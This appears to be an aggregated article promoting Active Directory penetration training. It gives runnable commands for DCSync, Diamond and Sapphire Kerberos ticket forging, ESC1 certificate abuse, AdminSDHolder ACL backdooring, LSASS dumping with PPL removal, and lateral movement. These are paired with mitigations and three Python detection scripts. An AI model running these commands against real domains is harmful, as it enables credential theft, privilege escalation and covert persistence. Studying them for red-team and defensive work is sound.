Master Active Directory Penetration: Unleashing Sapphire & Diamond Ticket Attacks – Enroll Now! + Video


Introduction:

Active Directory (AD) remains the crown jewel of enterprise authentication, yet its complexity breeds critical weaknesses such as Kerberos delegation misconfigurations and Active Directory Certificate Services (AD CS) template flaws. This article walks through offensive AD tradecraft, from initial exploitation to advanced persistence, based on the latest training curriculum from Ignite Technologies, which now covers DACL abuse, AD CS attacks, and the Sapphire and Diamond Ticket techniques.

Learning Objectives:

  • Execute Kerberos ticket-forging attacks (Golden, Silver, Diamond, and Sapphire Tickets) to obtain unauthorized access.
  • Perform advanced credential dumping and lateral movement using native Windows tools and Impacket.
  • Abuse ACLs and ADCS misconfigurations to escalate privileges and maintain persistence in forest environments.

You Should Know:

  1. Sapphire & Diamond Ticket Attacks – Bypassing Modern Kerberos Protections

Step‑by‑step guide explaining what this does and how to use it:

What are Diamond and Sapphire Tickets?

  • Diamond Ticket: Instead of forging a TGT from scratch (Golden Ticket), the attacker requests a legitimate TGT from a DC, decrypts it with the krbtgt key, edits the PAC (for example adding the Domain Admins RID 512 to the group list), re-encrypts it with the same key and uses it. Because the ticket really was issued by the KDC, a matching 4768 event exists and the ticket's flags, lifetime and encryption type match what the domain normally issues, which defeats detections that look for TGS requests without a preceding TGT request or for tickets with abnormal lifetimes.
  • Sapphire Ticket: A Diamond Ticket variant that does not hand-craft PAC changes at all. The attacker first obtains the real PAC of a privileged user (through an S4U2self + User-to-User request for that user) and transplants that legitimate PAC into the re-encrypted TGT, so even the PAC contents are exactly what the DC would have built. The evasion comes from the PAC being genuine, not from manipulating timestamps or the cname field.

Linux (Impacket):

 Extract the krbtgt keys from a DC (DCSync via secretsdump); -just-dc also returns the AES keys, which are needed so the forged ticket uses the same encryption type as legitimate tickets
impacket-secretsdump -just-dc 'domain.com/administrator:password@dc-ip'
 Example output: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:<NT_hash>:::  and  krbtgt:aes256-cts-hmac-sha1-96:<AES256_key>

 Diamond Ticket: ticketer -request obtains a real TGT as lowUser, decrypts it with the krbtgt key, rewrites the PAC as Administrator (RID 500, Domain Admins and the other default groups) and re-encrypts it; the result is written to Administrator.ccache
impacket-ticketer -request -domain domain.com -dc-ip dc-ip -user lowUser -password 'pass' -aesKey <AES256_key> -domain-sid <domain_SID> -user-id 500 -groups 512,513,518,519,520 Administrator

 Use the ticket with Impacket (a Rubeus .kirbi is first converted with: impacket-ticketConverter diamond.kirbi diamond.ccache)
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec -k -no-pass domain.com/Administrator@target.domain.com

Windows (Native + Rubeus):

 Get the krbtgt keys on a DC (run elevated; the output includes the AES keys alongside the NT hash)
mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" "exit"

 Diamond Ticket with Rubeus: it requests a real TGT as the supplied user, decrypts it with the krbtgt key (/krbkey), rewrites the PAC for /ticketuser and re-encrypts it; /enctype:aes keeps the ticket indistinguishable from the AES tickets the DC issues
Rubeus.exe diamond /krbkey:<AES256_key> /user:lowUser /password:<pass> /enctype:aes /ticketuser:Administrator /ticketuserid:500 /groups:512 /domain:megacorp.local /dc:dc1.megacorp.local /outfile:diamond.kirbi

 Sapphire Ticket: Rubeus has no sapphire action at the time of writing; the technique is implemented in Impacket's ticketer, which fetches Administrator's real PAC via S4U2self + U2U and embeds it in a TGT issued to lowUser
impacket-ticketer -request -impersonate Administrator -domain megacorp.local -dc-ip <dc_ip> -user lowUser -password 'pass' -aesKey <AES256_key> -domain-sid <domain_SID> lowUser

 Inject the ticket into the current logon session and verify it
Rubeus.exe ptt /ticket:diamond.kirbi
klist

Mitigation: Reset the krbtgt password twice in succession (allowing replication to complete between the two resets) after any suspected compromise and on a fixed schedule, since every Golden, Diamond or Sapphire ticket is valid only as long as the krbtgt key it was encrypted with; keep krbtgt and privileged accounts AES-only so that RC4 tickets (encryption type 0x17) stand out; and correlate Event 4769 (service-ticket requests) and 4624 (logons) with Event 4768 (TGT requests) collected from every DC, because a TGS request for an account that no DC issued a TGT to is the signature of a forged TGT. Kerberos Armoring (FAST) protects the pre-authentication exchange of domain-joined clients but does not by itself stop a forged TGT from being accepted.
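Because a Diamond or Sapphire ticket looks normal in isolation, the practical detection is correlation across the Security logs of all DCs. The following Python script is an added example (it is not from the Ignite curriculum or from any tool named on this page) that applies two of the checks from the mitigation note to a handful of constructed 4768/4769 records: a service-ticket request for an account that obtained no TGT within MaxTicketAge, and a service ticket encrypted with RC4 (0x17) in a domain that should only issue AES. The field names, timestamps, account names and SPNs are made up for the demonstration. A Sapphire ticket forged with the AES key and requested by the same account whose PAC it carries passes both checks, which is exactly why the technique matters; the remaining signal in that case is a 4627 group list, or the access actually performed, that does not fit the account.

```python
"""Correlate Kerberos TGT issuance (4768) with service-ticket requests (4769)
to surface forged TGTs. Added example over constructed events; not production code."""
from datetime import datetime, timedelta

# Encryption types a hardened domain should be issuing for tickets
AES_TYPES = {"0x11", "0x12"}  # aes128-cts-hmac-sha1-96, aes256-cts-hmac-sha1-96
RC4 = "0x17"

# Constructed sample events (not real telemetry). A 4768 TargetUserName is a
# sAMAccountName; a 4769 TargetUserName is usually user@REALM, hence the normaliser.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-05-01T08:00:00", "account": "lowuser", "status": "0x0", "enc": "0x12"},
    {"id": 4769, "time": "2024-05-01T08:05:00", "account": "lowuser@MEGACORP.LOCAL",
     "service": "cifs/fs01.megacorp.local", "enc": "0x12"},
    # Golden/Diamond style: TGS request for Administrator although no DC issued that TGT
    {"id": 4769, "time": "2024-05-01T08:10:00", "account": "Administrator@MEGACORP.LOCAL",
     "service": "cifs/dc01.megacorp.local", "enc": "0x12"},
    # Ticket forged with the krbtgt NT hash (RC4) in an AES-only domain
    {"id": 4768, "time": "2024-05-01T07:30:00", "account": "svc_backup", "status": "0x0", "enc": "0x12"},
    {"id": 4769, "time": "2024-05-01T09:00:00", "account": "svc_backup@MEGACORP.LOCAL",
     "service": "ldap/dc01.megacorp.local", "enc": RC4},
    # A failed TGT request (0x18 = pre-auth failed) must not count as an issued TGT
    {"id": 4768, "time": "2024-05-01T09:30:00", "account": "jdoe", "status": "0x18", "enc": "0x12"},
    {"id": 4769, "time": "2024-05-01T09:31:00", "account": "jdoe@MEGACORP.LOCAL",
     "service": "HTTP/web.megacorp.local", "enc": "0x12"},
]


def normalise(account):
    """Strip the realm and case so 4768 and 4769 account names compare equal."""
    return account.split("@", 1)[0].lower()


def detect_forged_tgts(events, max_ticket_age_hours=10, allowed_enc=AES_TYPES):
    """Return a list of (indicator, account, detail) tuples.

    'tgs_without_tgt': a 4769 with no successful 4768 for the same account in the
    preceding MaxTicketAge window (10 hours by default).
    'unexpected_enctype': the service ticket was not encrypted with an allowed type;
    RC4 usually means the krbtgt NT hash rather than the AES key was used to forge it.
    """
    window = timedelta(hours=max_ticket_age_hours)
    issued = {}
    for e in events:
        if e["id"] == 4768 and e.get("status") == "0x0":
            issued.setdefault(normalise(e["account"]), []).append(datetime.fromisoformat(e["time"]))

    findings = []
    for e in sorted(events, key=lambda x: x["time"]):  # ISO timestamps sort lexically
        if e["id"] != 4769:
            continue
        acct = normalise(e["account"])
        when = datetime.fromisoformat(e["time"])
        tgt_seen = any(timedelta(0) <= when - t <= window for t in issued.get(acct, []))
        if not tgt_seen:
            findings.append(("tgs_without_tgt", acct, e["service"]))
        if e["enc"] not in allowed_enc:
            findings.append(("unexpected_enctype", acct, e["enc"]))
    return findings


if __name__ == "__main__":
    for indicator, account, detail in detect_forged_tgts(SAMPLE_EVENTS):
        print(f"{indicator}: {account} ({detail})")
```

Feed it events from every DC in the forest; a 4769 is only suspicious when no DC at all logged the TGT, so a single DC's log produces false positives whenever the client talked to another KDC.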

  2. ADCS Abuse – Escalating to DA via Certificate Templates

Step‑by‑step guide explaining what this does and how to use it:

Overview: A template is ESC1-vulnerable when it is published on an enterprise CA, has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag set in msPKI-Certificate-Name-Flag (the requester chooses the subject and SAN), carries an EKU that permits domain authentication (Client Authentication, Smart Card Logon, PKINIT Client Authentication, Any Purpose, or no EKU at all), requires neither CA manager approval nor authorized signatures, and grants enrollment rights to a low-privileged principal such as Domain Users. Any such principal can then request a certificate whose SAN names a Domain Admin and authenticate with it via PKINIT.

Enumeration with Certipy (Linux):

certipy find -u '<user>@domain.com' -p 'pass' -dc-ip 10.0.0.1 -vulnerable -stdout
 Templates reported as ESC1 are the candidates; the built-in WebServer template is not ESC1 unless it has been modified to allow client authentication

 Request a certificate whose SAN names the Domain Admin (-ca is the CA's common name as printed by certipy find; the result is saved as administrator.pfx)
certipy req -u '<user>@domain.com' -p 'pass' -dc-ip 10.0.0.1 -ca '<CA_name>' -target ca.domain.com -template ESC1-Template -upn 'administrator@domain.com'

Windows using Certify:

Certify.exe find /vulnerable
Certify.exe request /ca:ca.domain.com\<CA_name> /template:ESC1-Template /altname:administrator
 Certify prints the certificate and private key as PEM; convert them to a PFX (openssl pkcs12 -export) before using the file with certipy auth or Rubeus asktgt /certificate:

Authenticate with the certificate (PKINIT) to obtain a TGT and the account's NT hash:

certipy auth -pfx administrator.pfx -domain domain.com -dc-ip 10.0.0.1
 Writes administrator.ccache (export KRB5CCNAME to use it with Impacket) and prints the NT hash recovered from the PAC credential information

Defense: Remove `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` (or the authentication EKU) from any template that low-privileged principals can enroll in, require CA certificate manager approval, restrict enrollment permissions to the groups that actually need the template, and enable strong certificate mapping (StrongCertificateBindingEnforcement with the szOID_NTDS_CA_SECURITY_EXT SID extension) so a certificate is bound to the requester's SID rather than to a UPN string the requester chose.
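The ESC1 conditions above form a checklist that can be evaluated mechanically against a template's LDAP attributes, which is what certipy find and Certify find do. The Python below is an added example, not Certipy or Certify code, that applies the checklist to two constructed template objects: a vulnerable one and the same template after the defences in the previous paragraph were applied. The flag values and EKU OIDs are the real ones from the AD CS schema; the template objects, the domain SID and the simplified enrollment_rights list (in a live directory this comes from the template's nTSecurityDescriptor) are constructed for the demonstration.

```python
"""Evaluate AD CS certificate templates for the ESC1 conditions.
Added example over constructed template objects; not Certipy/Certify code."""

# msPKI-Certificate-Name-Flag: the requester may supply the subject and SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag: CA certificate manager approval required
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that make a certificate usable for domain authentication
AUTHENTICATION_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Principals every domain account effectively belongs to
LOW_PRIV_WELL_KNOWN = {"S-1-1-0", "S-1-5-11"}  # Everyone, Authenticated Users
LOW_PRIV_DOMAIN_RIDS = {"513", "515"}          # Domain Users, Domain Computers

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID

VULNERABLE_TEMPLATE = {
    "name": "ESC1-Template",
    "enabled": True,  # published on an enterprise CA
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.1"],  # client + server auth
    "enrollment_rights": [DOMAIN_SID + "-513", DOMAIN_SID + "-512"],    # Domain Users, Domain Admins
}

# The same template after the defences: no requester-supplied subject, manager
# approval required, enrollment limited to an admin-controlled group (constructed RID 1200)
HARDENED_TEMPLATE = dict(
    VULNERABLE_TEMPLATE,
    **{
        "name": "ESC1-Template (hardened)",
        "msPKI-Certificate-Name-Flag": 0,
        "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
        "enrollment_rights": [DOMAIN_SID + "-1200"],
    },
)


def allows_authentication(ekus):
    """A template with no EKU at all is usable for any purpose, including client auth."""
    return not ekus or bool(AUTHENTICATION_EKUS.intersection(ekus))


def is_low_privileged(sid):
    """True for Everyone, Authenticated Users, Domain Users and Domain Computers."""
    if sid in LOW_PRIV_WELL_KNOWN:
        return True
    return sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[-1] in LOW_PRIV_DOMAIN_RIDS


def check_esc1(template):
    """Return (is_esc1, failed_conditions). ESC1 requires every condition to hold."""
    conditions = {
        "published_on_ca": bool(template["enabled"]),
        "enrollee_supplies_subject": bool(
            template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "authentication_eku": allows_authentication(template["pKIExtendedKeyUsage"]),
        "no_manager_approval": not (template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": template["msPKI-RA-Signature"] == 0,
        "low_priv_can_enroll": any(is_low_privileged(s) for s in template["enrollment_rights"]),
    }
    failed = [name for name, ok in conditions.items() if not ok]
    return not failed, failed


if __name__ == "__main__":
    for t in (VULNERABLE_TEMPLATE, HARDENED_TEMPLATE):
        vulnerable, failed = check_esc1(t)
        print(t["name"], "-> ESC1" if vulnerable else "-> not ESC1", failed)
```

Breaking any single condition is enough to close ESC1, but the hardened copy clears three of them on purpose: a template that only loses the requester-supplied-subject flag is still worth reviewing for the other ESC variants (ESC2 through ESC4 hinge on EKUs and template ACLs rather than on the SAN).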

  3. DACL Abuse – Backdooring AdminSDHolder

Step‑by‑step guide:

Concept: AdminSDHolder (CN=AdminSDHolder,CN=System) holds the template security descriptor that the SDProp process stamps onto every protected object (Domain Admins, Enterprise Admins, Administrators, the other protected groups and their members) every 60 minutes by default. An attacker who already holds Domain Admin rights adds an ACE granting a low-privileged user GenericAll (or WriteDACL / WriteOwner) on AdminSDHolder; within the hour that user holds the same rights over every protected group and account, and the ACE is re-applied by SDProp even if an administrator strips it from the individual groups. This is a persistence technique, not an initial escalation.

PowerView (Windows):

 List ACEs already granted to lowUser anywhere in the domain (to see whether the backdoor has propagated)
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -eq "lowUser"}

Add FullControl to lowUser on AdminSDHolder
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=com' -PrincipalIdentity lowUser -Rights All

BloodHound (Custom Cypher):

MATCH (u:User {name: "LOWUSER@DOMAIN.COM"})-[r:GenericAll|GenericWrite|WriteDacl|WriteOwner|AllExtendedRights]->(g:Group {name: "DOMAIN ADMINS@DOMAIN.COM"}) RETURN u,r,g

Detection: Put an auditing SACL on AdminSDHolder so that DACL changes produce Event 5136 (Directory Service Changes) and Event 4662, watch for Event 4780 (the ACL was set on a member of an administrators group, logged when SDProp re-stamps an object), and periodically export and diff the descriptor with `(Get-Acl 'AD:\CN=AdminSDHolder,CN=System,DC=domain,DC=com').Access` or `Get-ADObject -Identity 'CN=AdminSDHolder,CN=System,DC=domain,DC=com' -Properties ntSecurityDescriptor`.
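Because SDProp re-stamps the AdminSDHolder descriptor onto every protected object, the descriptor itself is the thing to audit. The Python below is an added example, not part of the page's tooling, that parses the SDDL string PowerShell returns for `(Get-Acl 'AD:\CN=AdminSDHolder,CN=System,DC=domain,DC=com').Sddl` and reports every allow ACE that grants a write-class right (GenericAll, GenericWrite, WriteDACL, WriteOwner, WriteProperty, control access, delete) to a principal outside the default administrative set. The SDDL string, the domain SID and the backdoor RIDs are constructed; the property GUID in the object ACE is a placeholder rather than a real schema attribute; and the allowlist is a starting baseline to be replaced with an export from a known-good domain.

```python
"""Audit an AdminSDHolder security descriptor (SDDL form) for write-class ACEs
granted to unexpected principals. Added example over a constructed SDDL string."""
import re

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID

# SDDL two-letter principal aliases that appear in AD descriptors
SID_ALIASES = {
    "SY": "S-1-5-18",           # Local System
    "BA": "S-1-5-32-544",       # BUILTIN\Administrators
    "AU": "S-1-5-11",           # Authenticated Users
    "WD": "S-1-1-0",            # Everyone
    "DA": DOMAIN_SID + "-512",  # Domain Admins
    "EA": DOMAIN_SID + "-519",  # Enterprise Admins
}

# Principals expected to hold write rights on AdminSDHolder; replace with an export from a clean domain
EXPECTED_WRITERS = {SID_ALIASES["SY"], SID_ALIASES["BA"], SID_ALIASES["DA"], SID_ALIASES["EA"]}

# Two-letter rights that let the holder change the object or take it over
WRITE_RIGHTS = {"GA", "GW", "WD", "WO", "WP", "CR", "SD", "DT"}
# The same rights when the ACE carries a hex access mask instead of letter codes
MASK_TO_CODE = {
    0x10000000: "GA",  # GENERIC_ALL
    0x40000000: "GW",  # GENERIC_WRITE
    0x00040000: "WD",  # WRITE_DAC
    0x00080000: "WO",  # WRITE_OWNER
    0x00000020: "WP",  # ADS_RIGHT_DS_WRITE_PROP
    0x00000100: "CR",  # ADS_RIGHT_DS_CONTROL_ACCESS
    0x00010000: "SD",  # DELETE
    0x00000040: "DT",  # ADS_RIGHT_DS_DELETE_TREE
}

# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

# Constructed SDDL: default-looking admin ACEs plus three backdoors and one deny ACE
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;EA)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)"
    "(A;;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;BA)"
    "(A;;LCRPLORC;;;AU)"                                  # read-only access: fine
    "(A;;GA;;;" + DOMAIN_SID + "-1105)"                  # backdoor: GenericAll for a normal user
    "(OA;;WP;11111111-2222-3333-4444-555555555555;;" + DOMAIN_SID + "-1106)"  # placeholder GUID
    "(A;;0x40000;;;" + DOMAIN_SID + "-1107)"             # hex-mask form: WRITE_DAC
    "(D;;GA;;;" + DOMAIN_SID + "-1108)"                  # deny ACE: grants nothing
)


def parse_rights(rights):
    """Return the write-class rights in an SDDL rights field (letter codes or hex mask)."""
    if rights.startswith("0x"):
        mask = int(rights, 16)
        return {code for bit, code in MASK_TO_CODE.items() if mask & bit}
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return codes & WRITE_RIGHTS


def audit_adminsdholder(sddl):
    """Return [(sid, sorted write rights)] for allow ACEs that grant write-class
    rights to principals not in EXPECTED_WRITERS."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not dacl:
        raise ValueError("no DACL in descriptor")
    findings = []
    for ace_type, _flags, rights, _obj, _inh, trustee in ACE_RE.findall(dacl.group(1)):
        if ace_type not in ("A", "OA"):  # only allow / object-allow ACEs grant anything
            continue
        sid = SID_ALIASES.get(trustee, trustee)
        granted = parse_rights(rights)
        if granted and sid not in EXPECTED_WRITERS:
            findings.append((sid, sorted(granted)))
    return findings


if __name__ == "__main__":
    for sid, rights in audit_adminsdholder(SAMPLE_SDDL):
        print(f"unexpected write access on AdminSDHolder: {sid} -> {', '.join(rights)}")
```

Run it against a scheduled export and alert on any new tuple; a GenericAll or WriteDACL grant to a SID outside the baseline is the backdoor this section describes, while an object-specific WriteProperty ACE is worth resolving (the GUID names the attribute) before deciding whether it belongs in the baseline.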

  4. Credential Dumping – LSASS and Registry Hive Extraction

Step‑by‑step guide:

Bypassing LSA Protection (PPL) with Mimikatz:

 "!+" registers and starts Mimikatz's own signed kernel driver (mimidrv.sys, which must sit next to mimikatz.exe); it needs local admin with SeLoadDriverPrivilege and may fail where HVCI or the Microsoft vulnerable-driver blocklist is enforced. The kernel write that clears the PPL flag on LSASS is the same primitive that BYOVD tooling obtains from other signed vulnerable drivers such as RTCore64.sys
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "!-" "exit"

Linux – Remote Dumping of the SAM and SYSTEM Hives over SMB:

 Save the hives on the target (wmiexec runs a single command over WMI and returns its output through the ADMIN$ share); against a DC the SAM holds only the DSRM account, so target member servers and workstations with this
impacket-wmiexec 'domain.com/user:pass@target-ip' 'reg save HKLM\SAM C:\Windows\Temp\sam.save & reg save HKLM\SYSTEM C:\Windows\Temp\system.save'
 Fetch the files in the interactive session (use C$ ; cd Windows\Temp ; get sam.save ; get system.save) and delete them afterwards
impacket-smbclient 'domain.com/user:pass@target-ip'
 Decrypt offline
impacket-secretsdump -sam sam.save -system system.save LOCAL
 Or let secretsdump do the remote extraction itself; on a DC it pulls NTDS secrets via DRSUAPI, or via a shadow copy with -use-vss
impacket-secretsdump 'domain.com/user:pass@target-ip'

Mitigation: Enable LSA Protection (RunAsPPL, ideally UEFI-locked so a registry change cannot disable it), enable Windows Defender Credential Guard so NTLM hashes and Kerberos keys are isolated from LSASS, enforce HVCI together with the Microsoft vulnerable driver blocklist to stop BYOVD loaders, and alert on Event 7045 (new kernel service installed) and Sysmon Event 6 (driver loaded).

  5. Lateral Movement – WinRM, PSRemoting, and WMI Over Kerberos

Step‑by‑step guide:

Using Evil-WinRM (Linux) with a ticket:

 Convert a Rubeus .kirbi to ccache and point Kerberos at it; Evil-WinRM needs the realm and KDC in /etc/krb5.conf, and the target must be addressed by hostname so the HTTP SPN matches
impacket-ticketConverter admin_ticket.kirbi admin_ticket.ccache
export KRB5CCNAME=admin_ticket.ccache
evil-winrm -i target.domain.com -r DOMAIN.COM

Windows native – PowerShell Remoting with alternate credentials:

$secPass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('domain\admin', $secPass)
Enter-PSSession -ComputerName CORP-SRV01 -Credential $cred -Authentication Kerberos

WMI (no interactive shell and fewer host artifacts than WinRM):

impacket-wmiexec -k -no-pass domain.com/<user>@target.domain.com "whoami /all"

Detection: Enable PowerShell Script Block Logging (Event 4104) and Module Logging (4103), monitor 4648 for logons with explicit credentials and 4624 logon type 3 from unexpected source hosts, enable the Microsoft-Windows-WinRM/Operational and Microsoft-Windows-WMI-Activity/Operational logs (remote WMI execution shows up as wmiprvse.exe spawning the command), and restrict WinRM (TCP 5985/5986) with host firewall rules to jump hosts only.

What Undercode Say:

  • Key Takeaway 1: Modern AD defence has to move from signature-style rules (a forged ticket with a ten-year lifetime) to correlation and baselining. Diamond and Sapphire tickets look legitimate on their own, so the detectable artefacts are contextual: a service-ticket request or Kerberos logon for an account that obtained no TGT from any DC, a logon whose 4627 group list does not match the account's real memberships, or RC4 where the domain only issues AES. Sysmon does not see Kerberos tickets; this needs the Security log (4768/4769/4624/4627) forwarded from every DC and member.
  • Key Takeaway 2: AD CS misconfigurations (ESC1–ESC8 and the later variants) are now among the fastest paths to Domain Admin; audit every certificate template with Certipy (find -vulnerable) or PSPKIAudit.

Analysis: The training curriculum from Ignite Technologies underscores a critical industry pivot: attackers no longer rely on memory-corruption exploits such as EternalBlue but abuse legitimate protocol features (Kerberos, certificates, ACLs). The addition of Sapphire tickets reflects the next step in evasion: rather than forging a PAC, the attacker has the KDC build a genuine PAC for a privileged user and transplants it into a TGT, so the ticket's contents no longer betray the forgery. Defenders must adopt a zero-trust posture: regular krbtgt rotation, SID filtering on trust boundaries, and continuous monitoring of AD CS enrollment (CA audit events 4886 and 4887). For blue teams, understanding these attacks is also the basis for effective deception, such as honeytoken ACEs or decoy certificate templates that catch low-noise intrusions.

Prediction:

Within 18 months, Sapphire‑style ticket forging will be weaponized by ransomware gangs to accelerate lateral movement from days to minutes, forcing Microsoft to introduce mandatory FAST armoring by default. AD CS will emerge as the next "PrintNightmare", pushing organizations to implement certificate auto‑enrollment with strict issuance policies. Offensive training like this will become mandatory for SOC analysts, not just pentesters, as tomorrow's attacks will blend Kerberos forgery with cloud‑synchronized identities (Entra ID). Prepare to see "Hybrid Ticket" attacks that bridge on‑prem AD and Entra ID through the Azure AD Kerberos trust.

Reported By: Active Directory – Hackers Feeds